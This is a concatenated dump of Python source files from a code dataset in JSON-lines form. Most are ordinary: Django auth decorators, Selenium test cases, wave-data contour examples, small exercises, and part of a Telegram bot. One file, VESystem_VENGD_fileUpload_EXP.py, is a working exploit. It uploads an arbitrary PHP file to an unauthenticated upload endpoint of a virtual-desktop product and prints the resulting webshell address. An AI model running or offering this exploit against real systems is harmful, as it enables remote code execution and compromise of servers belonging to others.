especialidad.id_especialidad\n print(idespecialidad)\n esp = Especialidad().getOne(idespecialidad)\n c = {}\n c['id_especialidad'] = esp.id_especialidad\n c['nombre'] = esp.nombre\n lista.append(c)\n\n listaE = {}\n \n listaE['listaEspecialidades'] = lista\n \n return listaE\n\n\ndef obtenerCursosxEspecialidad(idespecialidad):\n semestreActivo=Semestre().getOne()\n listaCursos= Curso.getCursosActivosxEspecialidad(semestreActivo.id_semestre,idespecialidad)\n lista=list()\n for curso in listaCursos:\n c={}\n c['id_curso'] = curso.id_curso \n c['nombre'] = curso.nombre\n c['clave'] = curso.codigo\n lista.append(c)\n\n listaC={}\n listaC['listaCursos'] = lista\n return listaC\n\ndef obtenerNombreSemestreActivo():\n semestreActivo=Semestre.getOne()\n s={}\n if semestreActivo != None:\n s['id_semestre'] = semestreActivo.id_semestre\n s['nombre'] = semestreActivo.nombre\n else:\n s['id_semestre'] =0\n s['nombre'] = '-'\n return s\n\ndef desactivarSemestre(idSemestre):\n m = Semestre().desactivar(idSemestre)\n return m","sub_path":"backend/app/controller/CTR_Mantenimiento.py","file_name":"CTR_Mantenimiento.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253644213","text":"from django.http import HttpResponse\nfrom django.template import RequestContext, loader\nimport django.contrib.auth.backends\nfrom ..settings import YEAR\nfrom .models import TutorProfile, Tutor, Rus\n\nclass NotTutor(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\nclass TutorData:\n pass\n\ndef user_profile_data(user):\n d = TutorData()\n if user is None or not user.is_authenticated():\n raise NotTutor('failauth')\n if not user.is_active:\n raise NotTutor('djangoinactive')\n try:\n d.profile = user.get_profile()\n except TutorProfile.DoesNotExist:\n raise NotTutor('notutorprofile')\n return d\n\ndef user_tutor_data(user):\n d = user_profile_data(user)\n try:\n d.tutor = Tutor.members.get(profile=d.profile)\n except Tutor.DoesNotExist:\n raise NotTutor('notutoryear')\n return d\n\ndef user_rus_data(user):\n d = user_profile_data(user)\n try:\n d.rus = Rus.objects.get(profile=d.profile, year=YEAR)\n except Rus.DoesNotExist:\n raise NotTutor('norusyear')\n return d\n\ndef rusclass_required_error(request):\n t = loader.get_template('rusclass_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\ndef tutorbest_required_error(request):\n t = loader.get_template('tutorbest_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\ndef tutor_required_error(request):\n t = loader.get_template('tutor_required.html')\n c = RequestContext(request)\n return HttpResponse(t.render(c), status=403)\n\n# Decorator\ndef tutorbest_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutorbest_required_error(request)\n if not d.tutor.is_tutorbest():\n return tutorbest_required_error(request)\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\n# Decorator\ndef tutor_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutor_required_error(request)\n if not d.tutor.is_member():\n 
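# a Tutor record exists for this user, but only current members may pass\n 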
return tutor_required_error(request)\n import inspect\n namedargs, varargs, varkw, defaults = inspect.getargspec(fn)\n if varkw is not None or 'tutor' in namedargs:\n kwargs['tutor'] = d.tutor\n if varkw is not None or 'profile' in namedargs:\n kwargs['profile'] = d.profile\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\n# Decorator\ndef tutorbur_required(fn):\n def wrapper(request, *args, **kwargs):\n if request.user.is_superuser:\n return fn(request, *args, **kwargs)\n try:\n d = user_tutor_data(request.user)\n except NotTutor as e:\n return tutorbest_required_error(request)\n if not d.tutor.is_tutorbur():\n return tutorbest_required_error(request)\n return fn(request, *args, **kwargs)\n wrapper.__name__ = fn.__name__\n return wrapper\n\nclass SwitchUserBackend(django.contrib.auth.backends.ModelBackend):\n def authenticate(self, username, current_user):\n if not current_user.is_superuser:\n return None\n\n from django.contrib.auth.models import User\n\n try:\n return User.objects.get(username=username)\n except User.DoesNotExist:\n return None\n","sub_path":"mftutor/tutor/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286691490","text":"#adding numbers\n\nprint(\"This program adds 10 numbers together\")\ni=0 #counter for how many times in the loop it has run\n\nprint(\"Enter a number:\")\ndef get_input():\n number = input()\n try:\n number = int(number)\n return number\n except: #to check if the person entered the right numbers or to clear the input\n if(number==\"clear\"):\n print(\"Breaking current addition chain.\\nStarting new total. Total is 0\")\n add_number(0,0)\n print(\"You can only enter numbers.\")\n return get_input()\n\n\ndef add_number(total,number_of_loops):\n if(number_of_loops+1<=10):\n add_this = get_input()\n new_total = total + add_this\n print(\"New total is:\",new_total, \"Current numbers added is\",number_of_loops+1)\n add_number(new_total,number_of_loops+1)\n else:\n print(\"Starting new total. 
Total is 0\")\n add_number(0,0)\n\nadd_number(0,0)","sub_path":"JayRequizoCodeA/TEST/Adding 10 numbers together.py","file_name":"Adding 10 numbers together.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258383033","text":"from functools import reduce\nfrom random import randint\nfrom requests import get\n\nfrom api_keys import LOCU_API_KEY, YELLOWPAGES_API_KEY\n\nLOCU_KEYS = ('street_address', 'locality', 'region',\n 'postal_code', 'lat', 'long')\nLOCU_URL = 'https://api.locu.com/v1_0/venue/search/'\nTO_REPLACE = (('Northwest', 'NW'), ('Northeast', 'NE'),\n ('Southeast', 'SE'), ('Southwest', 'SW'), ('Drive', 'Dr'),\n ('Trail', 'Trl'), ('Landng', 'Landing'), ('Street', 'St'),\n (' - ', '-'), ('.', ''), (',', ''))\nYELLOW_URL = 'http://api.sandbox.yellowapi.com/FindBusiness/'\n\n\n# use re.sub() instead?\n# http://stackoverflow.com/questions/6116978/python-replace-multiple-strings\n\n# import re\n#\n# rep = {\"condition1\": \"\", \"condition2\": \"text\"} # desired replacements here\n#\n# # use these three lines to do the replacement\n# rep = dict((re.escape(k), v) for k, v in rep.iteritems())\n# pattern = re.compile(\"|\".join(rep.keys()))\n# text = pattern.sub(lambda m: rep[re.escape(m.group(0))], text)\n\n# # -------------------------------------------------------------\n# pattern = re.compile(\"|\".join(re.escape(k) for k in rep))\n# text = pattern.sub(lambda m: rep[m.group(0)], text)\n\n\ndef clean_street_address(address):\n return reduce(lambda a, kv: a.replace(*kv), TO_REPLACE, address).strip()\n\n\ndef locu_addresses(locality=''):\n payload = {\n 'api_key': LOCU_API_KEY,\n # 'location': '{}, {}'.format(latitude, longitude),\n 'locality': locality\n }\n\n r = get(LOCU_URL, params=payload)\n if r.status_code != 200:\n print('Locu - Response #: {}'.format(r.status_code))\n return []\n\n addresses = []\n for i, address in enumerate(r.json()['objects'], start=1):\n is_valid = True\n valid_address = []\n for key in LOCU_KEYS:\n current = address[key]\n if not current:\n is_valid = False\n break\n valid_address.append(current)\n if is_valid:\n valid_address[0] = clean_street_address(valid_address[0])\n addresses.append(valid_address)\n return addresses\n\n\ndef yellow_addresses(locality=''):\n \"\"\" SANDBOX API: 300 calls per day, 1 call per second MAXIMUM \"\"\"\n payload = {\n # pg = 1 - 50 # requested page\n 'what': 'business', # keyword, business name or phone number\n 'where': locality,\n # 'where': 'cZ51.03977045017534,-114.07616310273404',\n 'pgLen': 100, # total results per page, integer 1 - 100\n # 'dist' = 1 # positive decimal value | max distance within KM\n 'fmt': 'JSON', # output format, XML or JSON\n 'apikey': YELLOWPAGES_API_KEY,\n 'UID': randint(1, 4097)\n }\n r = get(YELLOW_URL, params=payload)\n if r.status_code != 200:\n print('Yellow - Response #: {}'.format(r.status_code))\n return []\n\n return [(\n clean_street_address(a['address']['street']),\n a['address']['city'],\n a['address']['prov'],\n a['address']['pcode'],\n a['geoCode']['latitude'],\n a['geoCode']['longitude']\n ) for a in r.json()['listings']]\n","sub_path":"yellowpages_locu.py","file_name":"yellowpages_locu.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"191209251","text":"#!/usr/bin/python\n# Env: python3\n# Author: afei00123\n# -*- coding: utf8 -*-\n\nimport requests, urllib3, argparse\nfrom colorama 
import init\ninit(autoreset=True)\n\ndef title():\n print(\"\")\n print('*'.center(60, '*'))\n print(\"和信下一代云桌面VENGD(版本未知)\".center(40))\n print(\"github:https://github.com/ltfafei\".center(50))\n print(\"gitee:https://gitee.com/afei00123\".center(50))\n print(\"CSDN: afei00123.blog.csdn.net\".center(50))\n print(\"公众号:网络运维渗透\".center(40))\n print(\"\")\n print('*'.center(60, '*'))\n print(\"\")\n\ndef VENGD_RCE_EXP(url, payload):\n target_url = f\"{url}/Upload/upload_file.php?l=comm\"\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\",\n \"accept\": \"image/avif,image/webp,image/apng,image/*,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh; q=0.9, fil; q=0.8\",\n \"Cookie\": \"think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"close\",\n \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv\"\n }\n payload = f'''------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"comm.php\"\nContent-Type: image/avif\n\n{payload}\n------WebKitFormBoundaryfcKRltGv--'''\n try:\n state = requests.post(target_url, headers=headers, data=payload, timeout=2).status_code\n if state == 200:\n print(f\"[+] Webshell上传成功,Webshell地址:{url}/Upload/comm/comm.php\")\n except Exception as e:\n print(f\"[n] Webshell上传失败!\", e)\n exit()\n\nif(__name__ == \"__main__\"):\n title()\n parser = argparse.ArgumentParser(description=\"VESystem VENGD RCE EXP\")\n parser.add_argument(\n '-u', '--url', type=str, required='True',\n help='Please input target url. eg: https://ip:port'\n )\n parser.add_argument(\n '-p', '--payload', type=str, required='True',\n help='Please input content for upload. eg: '\n )\n args = parser.parse_args()\n VENGD_RCE_EXP(args.url, args.payload)","sub_path":"VESystem_VENGD_fileUpload_vuln/VESystem_VENGD_fileUpload_EXP.py","file_name":"VESystem_VENGD_fileUpload_EXP.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292070247","text":"from django.conf.urls import url\nfrom . 
import views\nfrom django.views.static import serve\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^([0-9])+/$', views.detail, name = 'detail'),\n url(r'^addevent/$', views.addevent, name = 'addevent'),\n url(r'^addevent/submitevent/$', views.submitevent, name = 'submitevent'),\n url(r'^user/(\\w+)/$', views.user_profile, name='user_profile'),\n url(r'^login/$', views.login_view, name='Login'),\n url(r'^logout/$', views.logout_view, name='Logout'),\n]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^media/(?P.*)$', serve,\n {'document_root' : settings.MEDIA_ROOT,}),\n ]\n","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275603827","text":"# -*- coding:UTF-8 -*-\nimport time\n\nimport retrying\nfrom selenium.common.exceptions import TimeoutException\n\nfrom base.abtemplate import AbTemplate, retry_if_timeout_exception\nfrom page import contractmanage, contractdetail\nfrom util import urldata\n\n\n# from page import xxx\n\nclass OMS(AbTemplate):\n # case info\n contract_id_value = \"1030190715361380\"\n\n # page info\n contract_manage_page = contractmanage.contactManagePage()\n contract_detail_page = contractdetail.ContactDetailPage()\n\n @retrying.retry(retry_on_exception=retry_if_timeout_exception, stop_max_attempt_number=2)\n def test_case(self):\n self.util_init(__file__)\n self.testcaseinfo.starttime = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n if self.flag > 1:\n self.setUp()\n try:\n self.step = \"convert to contract manage page\"\n self.logger.info(self.step)\n self.convert_to_url(urldata.URLData().get_contract_manage_url())\n self.wait_url_to_be(urldata.URLData().get_contract_manage_url())\n\n self.step=\"select company\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_manage_page.contract_id_box)\n self.Select(self.contract_manage_page.select_company,self.contract_manage_page.company_value)\n\n self.step = \"fill contract\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_manage_page.contract_id_box)\n self.fill(self.contract_manage_page.contract_id_box, self.contract_id_value)\n\n self.step = \"click query\"\n self.logger.info(self.step)\n self.click(self.contract_manage_page.query_contact_button)\n\n self.step = \"click contract\"\n self.logger.info(self.step)\n self.wait_clickable(self.contract_manage_page.contract_id_link)\n self.click(self.contract_manage_page.contract_id_link)\n self.driver.close()\n self.switch_handel()\n\n self.step = \"click anthorize log\"\n self.logger.info(self.step)\n self.wait_clickable(self.contract_detail_page.contractYeeuuBtn_button)\n self.click(self.contract_detail_page.contractYeeuuBtn_button)\n\n self.step = \"fill start datetime\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.yeeuuStart_box)\n self.fill(self.contract_detail_page.yeeuuStart_box, self.contract_detail_page.yeeuu_start_value)\n\n self.step = \"fill end datetime\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.yeeuuStart_box)\n self.fill(self.contract_detail_page.yeeuuEnd_box, self.contract_detail_page.yeeuu_end_value)\n\n self.step = \"click confirm\"\n self.logger.info(self.step)\n self.click(self.contract_detail_page.yeeuu_confirm)\n\n self.step = \"validate is authorize log page\"\n self.logger.info(self.step)\n self.wait_visable(self.contract_detail_page.authorize_info)\n anthorize_info = 
self.get_text_Infor(self.contract_detail_page.authorize_info)\n self.assertEquals(\"授权记录\", anthorize_info, \"页面跳转失败\")\n\n self.testcaseinfo.result = \"Pass\"\n pass\n except TimeoutException:\n self.timeout_method()\n except Exception as err:\n self.exception_method(err)\n finally:\n self.finally_method()\n","sub_path":"testcaseunit/contract_manage_moudel/oms272_contract_anthorize_log.py","file_name":"oms272_contract_anthorize_log.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15920875","text":"def main():\n \n x = int(input('Introduce un número: '))\n \n if x>0 and x%2 == 0:\n return(\"El número es par positivo\")\n elif x>0 and x%2 != 0:\n return(\"El número es impar positivo\")\n elif x<0 and x%2 == 0:\n return(\"El número es par negativo\")\n elif x<0 and x%2 != 0:\n return(\"El número es impar negativo\")\n else:\n return(\"El 0 no es par ni impar\")\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"ActClase7/ej1 pares - juntos.py","file_name":"ej1 pares - juntos.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565909750","text":"import datetime\nimport math\n\n\ndef e1(num):\n \"\"\"\n 求100内的素数\n :return: 数组\n\n \"\"\"\n arr = []\n for i in range(2, num + 1):\n flag = True\n for j in range(2, i // 2 + 1):\n if i % j == 0:\n flag = False\n break\n if flag:\n arr.append(i)\n return arr\n\n\ndef e1_1(num):\n \"\"\"\n 求100内的素数\n :return: 数组\n \"\"\"\n arr = []\n flag = True\n for x in range(2, num):\n for i in arr:\n if x % i == 0:\n flag = False\n break\n if i >= math.ceil(math.sqrt(x)):\n flag = True\n break\n if flag:\n arr.append(x)\n return arr\n\n\ndef e2(n):\n \"\"\"\n 计算杨辉三角前n行\n :param n:\n :return:\n \"\"\"\n triangle = []\n if n >= 1:\n triangle.append([1])\n if n >= 2:\n triangle.append([1, 2])\n for i in range(2, n):\n cur = [1]\n pre = triangle[i - 1]\n for j in range(len(pre) - 1):\n cur.append(pre[j] + pre[j + 1])\n cur.append(1)\n triangle.append(cur)\n return triangle\n\n\ndef e3(matrix):\n \"\"\"\n 给定任何一个矩阵,求转置矩阵\n 1 2 3 1 4\n 4 5 6 ==> 2 5\n 3 6\n :param matrix:\n :return:\n \"\"\"\n tm = []\n count = 0\n for row in matrix:\n for i, col in enumerate(row):\n if len(tm) < i + 1:\n tm.append([])\n tm[i].append(col)\n count += 1\n return tm\n\n\ndef e3_1(matrix):\n \"\"\"\n 给定任何一个矩阵,求转置矩阵\n 1 2 3 1 4\n 4 5 6 ==> 2 5\n 3 6\n :param matrix:\n :return:\n \"\"\"\n tm = [[0 for col in range(len(matrix))] for row in range(len(matrix[0]))]\n count = 0\n for i, row in enumerate(tm):\n for j, col in enumerate(row):\n tm[i][j] = matrix[j][i]\n count += 1\n return tm\n\n\nif __name__ == \"__main__\":\n # print(e1(100))\n # print(e1_1(100))\n\n print(e2(6))\n\n matrix = [[1, 2, 3, 5, 9, 5434], [4, 5, 6, 1, 123, 555], [3, 3, 4, 4, 5, 5]]\n\n start = datetime.datetime.now()\n print(e3(matrix))\n p1 = datetime.datetime.now()\n\n print(e3_1(matrix))\n p2 = datetime.datetime.now()\n print(\"method 1: \" + str(p1.timestamp() - start.timestamp()))\n print(\"method 2: \" + str(p2.timestamp() - p1.timestamp()))\n","sub_path":"base/chapter02-datastructures/01-list.py","file_name":"01-list.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650662370","text":"import Tkinter as tk\r\nfrom Tkinter import *\r\nimport ttk\r\nfrom tkSearch import *\r\nfrom tkDelete import *\r\n\r\nb = 
\"Busqueda\"\r\nt1 = \"Keyword\"\r\nt2 = \"Usuario\"\r\nt3 = \"Procesos\"\r\nprocesses = []\r\n\r\n#Main window\r\nclass TwitterApp(tk.Tk):\r\n def __init__(self, *args, **kwargs):\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n #Title inside window on top\r\n self.topLabel = tk.Label(self, text = \"Twitter App\")\r\n self.topLabel.pack()\r\n\r\n #Tab interface\r\n self.tab = ttk.Notebook(self)\r\n \r\n #Adding titles to tabs\r\n titles = [b, t3]\r\n self.frames = {}\r\n for title in titles:\r\n self.frames[title] = ttk.Frame(self.tab)\r\n self.tab.add(self.frames[title], text = title)\r\n\r\n #Frame for search\r\n self.searchKey = toSearch(self.frames[b], b, self)\r\n self.searchKey.pack()\r\n\r\n #Frame for list of processes\r\n self.deleteList = toDelete(self.frames[t3], self)\r\n self.deleteList.pack()\r\n \r\n self.tab.pack()\r\n \r\n\r\napp = TwitterApp()\r\napp.title(\"Twitter App\")\r\napp.geometry('565x330')\r\napp.mainloop()\r\n \r\n","sub_path":"App/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475989239","text":"import numpy as np\nimport WDRT.ESSC as ESSC\nimport copy\nimport os \nimport matplotlib.pyplot as plt\n\n# Create buoy object, in this case for Station #46022\nbuoy46022 = ESSC.Buoy('46022', 'NDBC')\n\n# Read data from ndbc.noaa.gov\n#buoy46022.fetchFromWeb()\n#buoy46022.saveAsTxt(savePath = \"./Data\")\n#buoy46022.saveAsH5('NDBC46022.h5')\n\n# Load data from .txt file if avilable\n#buoy46022.loadFromTxt(r'C:\\full\\filepath\\to\\WDRT\\examples\\data\\NDBC46022')\n\n# Load data from .h5 file if available\ndataPath = os.path.join('data', 'NDBC46022.h5')\nbuoy46022.loadFromH5(dataPath)\n\n# Declare required parameters\nTime_SS = 1. 
# Sea state duration (hrs)\nTime_R = 100 # Return periods (yrs) of interest\n\n# Create PCA EA object for the buoy\npca46022 = ESSC.PCA(buoy46022)\n\n# Calculate contour using PCA method\npca_Hs_Return, pca_T_Return = pca46022.getContours(Time_SS, Time_R)\n\n# Show a plot of the data\npca46022.plotData()\n\n# Sample Generation Example\nnum_contour_points = 20 # Number of points to be sampled for each\n# contour interval.\ncontour_returns = np.array([0.001, 0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100])\n# Probabilities defining sampling contour bounds.\nrandom_seed = 2 # Random seed for sample generation\n\n# Get samples for a full sea state long term analysis\nHs_sampleFSS, T_sampleFSS, Weight_sampleFSS = pca46022.getSamples(num_contour_points,\n contour_returns, random_seed)\n# Get samples for a contour approach long term analysis\nT_sampleCA = np.arange(12, 26, 2)\nHs_sampleCA = pca46022.getContourPoints(T_sampleCA)\n\n# Save data in h5 file\n#pca46022.saveContour(r'C:\\full\\filepath\\to\\WDRT\\examples\\NDBC%s' % (pca46022.buoy.buoyNum))\n#pca46022.saveContour(r'testNDBC%s' % (pca46022.buoy.buoyNum))\npca46022.saveContour(r'data\\example_envSampleNDBC%s' % (pca46022.buoy.buoyNum))\n\n# Create EA objects for remaining contour methods\nGauss46022 = ESSC.GaussianCopula(buoy46022)\nGumbel46022 = ESSC.GumbelCopula(buoy46022)\nClayton46022 = ESSC.ClaytonCopula(buoy46022)\nrosen46022 = ESSC.Rosenblatt(buoy46022)\nNonParaGauss46022 = ESSC.NonParaGaussianCopula(buoy46022)\nNonParaClay46022 = ESSC.NonParaClaytonCopula(buoy46022)\nNonParaGum46022 = ESSC.NonParaGumbelCopula(buoy46022)\nBivariateKDE46022 = ESSC.BivariateKDE(buoy46022, bw = [0.23, 0.23], logTransform = False)\nBivariateLogKDE46022 = ESSC.BivariateKDE(buoy46022, bw = [0.02, 0.11], logTransform = True)\n\n# Calculate contours for all remaining contour methods\nGauss_Hs_Return, Gauss_T_Return = Gauss46022.getContours(Time_SS, Time_R)\nGumbel_Hs_Return, Gumbel_T_Return = Gumbel46022.getContours(Time_SS, Time_R)\nClayton_Hs_Return, Clayton_T_Return = Clayton46022.getContours(Time_SS, Time_R)\nrosen_Hs_Return, rosen_T_Return = rosen46022.getContours(Time_SS, Time_R)\nNonParaGau_Hs_Return, NonParaGau_T_Return = NonParaGauss46022.getContours(Time_SS, Time_R)\nNonParaClay_Hs_Return, NonParaClay_T_Return = NonParaClay46022.getContours(Time_SS, Time_R)\nNonParaGum_Hs_Return, NonParaGum_T_Return = NonParaGum46022.getContours(Time_SS, Time_R)\nKDE_Hs_Return, KDE_T_Return = BivariateKDE46022.getContours(Time_SS, Time_R)\nlogKDE_Hs_Return, logKDE_T_Return = BivariateLogKDE46022.getContours(Time_SS, Time_R)\n\n# Plot all contour results for comparison\nf = plt.figure()\nf.canvas.set_window_title('NDBC%s, %i-year contours' % (buoy46022.buoyNum, Time_R))\nplt.plot(buoy46022.T, buoy46022.Hs, 'bo', alpha=0.1, label='Data')\nplt.plot(pca_T_Return, pca_Hs_Return, '-', label='PCA')\nplt.plot(Gauss_T_Return, Gauss_Hs_Return, '-', label='Gaussian')\nplt.plot(Gumbel_T_Return, Gumbel_Hs_Return, '-', label='Gumbel')\nplt.plot(Clayton_T_Return, Clayton_Hs_Return, '-', label='Clayton')\nplt.plot(rosen_T_Return, rosen_Hs_Return, '-', label='Rosenblatt')\nplt.plot(NonParaGau_T_Return, NonParaGau_Hs_Return, 'g--', label='Non-Parametric Gaussian')\nplt.plot(NonParaGum_T_Return, NonParaGum_Hs_Return, 'r--', label='Non-Parametric Gumbel')\nplt.plot(NonParaClay_T_Return, NonParaClay_Hs_Return, 'c--', label='Non-Parametric Clayton')\nplt.plot(KDE_T_Return, KDE_Hs_Return, 'm--', label = 'Bivariate KDE')\nplt.plot(logKDE_T_Return, logKDE_Hs_Return, 'b--', label = 'Bivariate 
KDE (log)')\nplt.xlabel('Energy period, $T_e$ [s]')\nplt.ylabel('Sig. wave height, $H_s$ [m]')\nplt.grid(True)\nplt.legend(loc='center right', bbox_to_anchor=(1.4,0.5),fontsize=10, fancybox=True)\nplt.show()\n\n\n# Modify contour by steepness curve if they intersect\n# Declare required parameters\ndepth = 391.4 # Depth at measurement point (m)\nSteepMax = 0.07 # Optional: enter estimate of breaking steepness\nT_vals = np.arange(0.1, np.amax(buoy46022.T), 0.1)\n\n#Note, if depth is not inputted manually, it will automatically be retrieved from NDBC's website\nSteepH = pca46022.steepness(SteepMax, T_vals,depth = depth)\nSteepH_Return = pca46022.steepness(SteepMax, pca46022.T_ReturnContours, depth = depth)\n\nSteep_correction = np.where(SteepH_Return < pca46022.Hs_ReturnContours)\nHs_Return_Steep = copy.deepcopy(pca46022.Hs_ReturnContours)\nHs_Return_Steep[Steep_correction] = SteepH_Return[Steep_correction]\n\npca46022.plotSampleData()\n\n# Take a subset of 10 years of data and calculate a 20-year contour using the subset\nTime_R = 20\nsubsetBuoy = buoy46022.createSubsetBuoy(10)\nsubsetPCA = ESSC.PCA(subsetBuoy)\nSubset_Hs_Return, Subset_T_Return = subsetPCA.getContours(Time_SS, Time_R)\n\n# Plot contour and subsetted data\nf = plt.figure()\nf.canvas.set_window_title('NDBC%s, %i-year contours' % (subsetBuoy.buoyNum, Time_R))\nplt.plot(subsetBuoy.T, subsetBuoy.Hs, 'bo', alpha=0.1, label='Data')\nplt.plot(Subset_T_Return, Subset_Hs_Return, '-', label = 'PCA')\nplt.xlabel('Energy period, $T_e$ [s]')\nplt.ylabel('Sig. wave height, $H_s$ [m]')\nplt.grid(True)\nplt.legend(loc='center right', bbox_to_anchor=(1.4,0.5),fontsize=10, fancybox=True)\nplt.show()\n\n# Determine which buoy observations are outside of the contour\noutsideT, outsideHs = subsetPCA.outsidePoints()\n\n# Determine the area of the contour\nsubsetPCAArea = subsetPCA.contourIntegrator()\n\n# Calculate bootstrap confidence intervals, commented out due to long run time\n# Note that stable bootstrap confidence intervals require large sample sizes\n# pca46022.bootStrap(boot_size=10)\n# Gauss46022.bootStrap(boot_size=10)\n# Gumbel46022.bootStrap(boot_size=10)\n# cc46022.bootStrap(boot_size=10)\n# rosen46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n# NonParaGauss46022.bootStrap(boot_size=10)\n\n\n","sub_path":"examples/example_envSampling.py","file_name":"example_envSampling.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"587973810","text":"import numpy as np\nimport pandas as pd\nfrom nolearn.dbn import DBN\n###############################################################################\n# Load Data\nX_train=pd.read_csv('scikit_train_features.csv',header=None).values\nY_train=np.ravel(pd.read_csv('scikit_train_labels.csv',header=None).values)\nX_test =pd.read_csv('scikit_test.csv',header=None).values\nclf = DBN(\n[X_train.shape[1], 2000,1000,350,-1],\nlearn_rates=0.25,\nlearn_rate_decays=0.9,\nlearn_rates_pretrain=0.005,\nepochs=300,\nverbose=1,)\nclf.fit(X_train, Y_train)\nsubm= clf.predict(X_test)\ndataset=pd.Series(subm)\ndataset.index= np.arange(1, len(dataset)+1)\ndataset.to_csv('scikit_results2_NN.csv',header=['Solution'],index_label='Id')\n","sub_path":"scikit_learn_NN.py","file_name":"scikit_learn_NN.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"311596955","text":"from tkinter import Canvas, Frame, BOTH\n\nclass Example(Frame):\n \n def __init__(self,root,x,y,incidence,ne):\n super().__init__()\n self.root=root\n self.x=x\n self.y=y\n self.incidence=incidence\n self.ne=ne\n\n #self.initUI()\n self.drawLines()\n \n\n def initUI(self):\n\n self.root.title(\"Lines\")\n self.pack(fill=BOTH, expand=1)\n\n canvas = Canvas(self)\n canvas.create_line(15, 25, 200, 25)\n canvas.create_line(300, 35, 300, 200, dash=(4, 2))\n canvas.create_line(55, 85, 155, 85, 105, 180, 55, 85)\n\n canvas.pack(fill=BOTH, expand=1)\n \n def drawLines(self) :\n self.root.title(\"Lines2d\")\n self.pack(fill=BOTH, expand=1)\n canvas=Canvas(self.root, width=300, height=200)\n canvas.pack()\n #print('2DLines')\n canvas.create_line(300, 35, 300, 200, dash=(4, 2))\n i=0\n while i < self.ne :\n \n canvas.create_line(self.x[self.incidence[i][0]],self.y[self.incidence[i][0]],self.x[self.incidence[i][1]],self.y[self.incidence[i][1]])\n i +=1\n canvas.pack(fill=BOTH, expand=1) ","sub_path":"wire3d_mod.py","file_name":"wire3d_mod.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533153323","text":"from app import create_app, db\nfrom app.models import User, Course, Review\n\napp = create_app()\n\n@app.shell_context_processor\ndef make_shell_context():\n return dict(app=app,\n db=db,\n User=User,\n Course=Course,\n Review=Review)\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"623307340","text":"import logging\nimport text\nimport json\nfrom mongodb import mongo_get_index, mongo_receive_cities\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, Updater, CallbackQueryHandler\nimport emojis\nimport math\n\n# Global variables\n_cached_city = \"Киев\"\n_cached_city_page = 1\n\n_cached_index_page = 1\n_cached_index_dict = {}\n\ndef get_token():\n with open(\"config.json\", \"r\") as config:\n config = 